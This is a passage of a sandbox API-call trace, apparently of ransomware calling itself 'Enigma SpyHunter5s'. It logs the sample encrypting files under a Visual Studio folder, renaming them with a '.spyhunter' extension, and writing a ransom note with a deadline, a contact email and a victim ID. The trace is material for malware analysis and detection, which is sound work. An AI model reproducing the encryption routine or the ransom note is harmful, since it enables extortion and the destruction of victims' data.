[0165.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0165.479] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e6b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e6b0*=0x30) returned 1 [0165.479] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\XmlFile.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\xmlfile.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0165.480] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\XmlFile.zip") returned 107 [0165.480] StrStrW (lpFirst="XmlFile.zip", lpSrch=".txt") returned 0x0 [0165.480] GetProcessHeap () returned 0x2c0000 [0165.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0165.480] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e674, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e674*=0x251, lpOverlapped=0x0) returned 1 [0165.481] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffdaf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.481] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x251, lpNumberOfBytesWritten=0x248e674, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e674*=0x251, lpOverlapped=0x0) returned 1 [0165.481] GetProcessHeap () returned 0x2c0000 [0165.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0165.481] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.482] WriteFile (in: hFile=0x178, lpBuffer=0x248e6b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e674, lpOverlapped=0x0 | out: lpBuffer=0x248e6b4*, lpNumberOfBytesWritten=0x248e674*=0x4, lpOverlapped=0x0) returned 1 [0165.482] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e674, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e674*=0x30, lpOverlapped=0x0) returned 1 [0165.482] CloseHandle (hObject=0x178) returned 1 [0165.482] GetProcessHeap () returned 0x2c0000 [0165.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.482] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\XmlFile.zip.spyhunter") returned 117 [0165.482] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\XmlFile.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\xmlfile.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\XmlFile.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\xmlfile.zip.spyhunter")) returned 1 [0165.567] GetProcessHeap () returned 0x2c0000 [0165.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.567] GetProcessHeap () returned 0x2c0000 [0165.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0165.568] GetProcessHeap () returned 0x2c0000 [0165.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eac180 | out: hHeap=0x2c0000) returned 1 [0165.568] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e6b8 | out: pbBuffer=0x248e6b8) returned 1 [0165.568] GetProcessHeap () returned 0x2c0000 [0165.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0165.568] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e6b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e6b0*=0x30) returned 1 [0165.568] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\SettingsInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settingsinternal.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0165.569] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\SettingsInternal.zip") returned 116 [0165.569] StrStrW (lpFirst="SettingsInternal.zip", lpSrch=".txt") returned 0x0 [0165.569] GetProcessHeap () returned 0x2c0000 [0165.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0165.569] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e674, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e674*=0x3d4, lpOverlapped=0x0) returned 1 [0165.693] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffc2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.693] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x248e674, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e674*=0x3d4, lpOverlapped=0x0) returned 1 [0165.693] GetProcessHeap () returned 0x2c0000 [0165.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0165.694] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.694] WriteFile (in: hFile=0x178, lpBuffer=0x248e6b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e674, lpOverlapped=0x0 | out: lpBuffer=0x248e6b4*, lpNumberOfBytesWritten=0x248e674*=0x4, lpOverlapped=0x0) returned 1 [0165.694] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e674, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e674*=0x30, lpOverlapped=0x0) returned 1 [0165.694] CloseHandle (hObject=0x178) returned 1 [0165.694] GetProcessHeap () returned 0x2c0000 [0165.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.694] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\SettingsInternal.zip.spyhunter") returned 126 [0165.694] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\SettingsInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settingsinternal.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\SettingsInternal.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settingsinternal.zip.spyhunter")) returned 1 [0165.695] GetProcessHeap () returned 0x2c0000 [0165.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.695] GetProcessHeap () returned 0x2c0000 [0165.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0165.695] GetProcessHeap () returned 0x2c0000 [0165.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e87b80 | out: hHeap=0x2c0000) returned 1 [0165.695] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e6b0 | out: pbBuffer=0x248e6b0) returned 1 [0165.695] GetProcessHeap () returned 0x2c0000 [0165.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0165.695] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e6a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e6a8*=0x30) returned 1 [0165.695] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resource.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0165.695] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip") returned 108 [0165.696] StrStrW (lpFirst="Resource.zip", lpSrch=".txt") returned 0x0 [0165.696] GetProcessHeap () returned 0x2c0000 [0165.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0165.696] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e66c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e66c*=0x83f, lpOverlapped=0x0) returned 1 [0165.796] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff7c1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.796] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x83f, lpNumberOfBytesWritten=0x248e66c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e66c*=0x83f, lpOverlapped=0x0) returned 1 [0165.796] GetProcessHeap () returned 0x2c0000 [0165.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0165.796] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.796] WriteFile (in: hFile=0x178, lpBuffer=0x248e6ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e66c, lpOverlapped=0x0 | out: lpBuffer=0x248e6ac*, lpNumberOfBytesWritten=0x248e66c*=0x4, lpOverlapped=0x0) returned 1 [0165.796] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e66c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e66c*=0x30, lpOverlapped=0x0) returned 1 [0165.796] CloseHandle (hObject=0x178) returned 1 [0165.796] GetProcessHeap () returned 0x2c0000 [0165.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.796] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip.spyhunter") returned 118 [0165.796] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resource.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resource.zip.spyhunter")) returned 1 [0165.797] GetProcessHeap () returned 0x2c0000 [0165.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.797] GetProcessHeap () returned 0x2c0000 [0165.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0165.797] GetProcessHeap () returned 0x2c0000 [0165.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eabbb8 | out: hHeap=0x2c0000) returned 1 [0165.797] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e6b0 | out: pbBuffer=0x248e6b0) returned 1 [0165.798] GetProcessHeap () returned 0x2c0000 [0165.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0165.798] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e6a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e6a8*=0x30) returned 1 [0165.798] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0165.798] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip") returned 117 [0165.798] StrStrW (lpFirst="AppConfigInternal.zip", lpSrch=".txt") returned 0x0 [0165.798] GetProcessHeap () returned 0x2c0000 [0165.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0165.798] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e66c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e66c*=0x26d, lpOverlapped=0x0) returned 1 [0165.820] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd93, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.820] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x26d, lpNumberOfBytesWritten=0x248e66c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e66c*=0x26d, lpOverlapped=0x0) returned 1 [0165.820] GetProcessHeap () returned 0x2c0000 [0165.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0165.820] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.820] WriteFile (in: hFile=0x178, lpBuffer=0x248e6ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e66c, lpOverlapped=0x0 | out: lpBuffer=0x248e6ac*, lpNumberOfBytesWritten=0x248e66c*=0x4, lpOverlapped=0x0) returned 1 [0165.820] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e66c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e66c*=0x30, lpOverlapped=0x0) returned 1 [0165.820] CloseHandle (hObject=0x178) returned 1 [0165.821] GetProcessHeap () returned 0x2c0000 [0165.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.821] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.spyhunter") returned 127 [0165.821] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip.spyhunter")) returned 1 [0165.822] GetProcessHeap () returned 0x2c0000 [0165.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.822] GetProcessHeap () returned 0x2c0000 [0165.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0165.822] GetProcessHeap () returned 0x2c0000 [0165.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e876a0 | out: hHeap=0x2c0000) returned 1 [0165.822] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0165.824] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0165.824] WriteFile (in: hFile=0x178, lpBuffer=0x248e5df*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e708, lpOverlapped=0x0 | out: lpBuffer=0x248e5df*, lpNumberOfBytesWritten=0x248e708*=0x127, lpOverlapped=0x0) returned 1 [0165.825] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0165.825] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e708, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e708*=0x2ac, lpOverlapped=0x0) returned 1 [0165.825] CloseHandle (hObject=0x178) returned 1 [0165.826] GetProcessHeap () returned 0x2c0000 [0165.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec8470 | out: hHeap=0x2c0000) returned 1 [0165.826] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e6a8 | out: pbBuffer=0x248e6a8) returned 1 [0165.826] GetProcessHeap () returned 0x2c0000 [0165.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0165.826] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e6a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e6a0*=0x30) returned 1 [0165.826] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\System.AddIn.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\system.addin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0165.827] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\System.AddIn.dll") returned 98 [0165.827] StrStrW (lpFirst="System.AddIn.dll", lpSrch=".txt") returned 0x0 [0165.827] GetProcessHeap () returned 0x2c0000 [0165.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0165.827] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e664, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e664*=0x2800, lpOverlapped=0x0) returned 1 [0165.842] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.842] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e664, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e664*=0x2800, lpOverlapped=0x0) returned 1 [0165.842] GetProcessHeap () returned 0x2c0000 [0165.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0165.842] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.842] WriteFile (in: hFile=0x178, lpBuffer=0x248e6a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e664, lpOverlapped=0x0 | out: lpBuffer=0x248e6a4*, lpNumberOfBytesWritten=0x248e664*=0x4, lpOverlapped=0x0) returned 1 [0165.844] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e664, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e664*=0x30, lpOverlapped=0x0) returned 1 [0165.844] CloseHandle (hObject=0x178) returned 1 [0165.844] GetProcessHeap () returned 0x2c0000 [0165.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.844] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\System.AddIn.dll.spyhunter") returned 108 [0165.844] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\System.AddIn.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\system.addin.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\System.AddIn.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\system.addin.dll.spyhunter")) returned 1 [0165.846] GetProcessHeap () returned 0x2c0000 [0165.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.846] GetProcessHeap () returned 0x2c0000 [0165.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0165.846] GetProcessHeap () returned 0x2c0000 [0165.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec8358 | out: hHeap=0x2c0000) returned 1 [0165.846] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e6a0 | out: pbBuffer=0x248e6a0) returned 1 [0165.846] GetProcessHeap () returned 0x2c0000 [0165.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0165.846] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e698*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e698*=0x30) returned 1 [0165.846] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.comrpcchannel.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0165.848] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll") returned 141 [0165.848] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll", lpSrch=".txt") returned 0x0 [0165.848] GetProcessHeap () returned 0x2c0000 [0165.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0165.848] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e65c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, 